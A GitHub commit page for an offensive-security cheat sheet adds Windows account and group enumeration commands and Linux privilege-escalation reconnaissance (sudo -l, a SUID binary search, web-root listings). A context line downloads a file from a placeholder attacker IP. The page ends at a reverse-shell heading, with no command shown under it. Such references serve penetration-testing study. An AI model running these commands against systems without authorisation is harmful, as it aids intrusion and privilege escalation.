kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-08-04 07:18:20 -04:00
committed by GitHub
parent f0455095c3
commit 2f71f0b4b5
1 changed files with 34 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

34
README.md
View File

@@ -407,6 +407,24 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
<br />
```bash
# Enumeration
# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
```
<br />
## Linux - Linpeas
<br />
@@ -417,6 +435,22 @@ wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
<br />
```bash
#Check commands you can execute with sudo
sudo -l
#Find all SUID binaries
find / -perm -4000 2>/dev/null
# Web files
ls -alhR /var/www/ 2>/dev/null
ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
```
<br />
# Reverse Shell
## NC Listen - Client [STEP 1]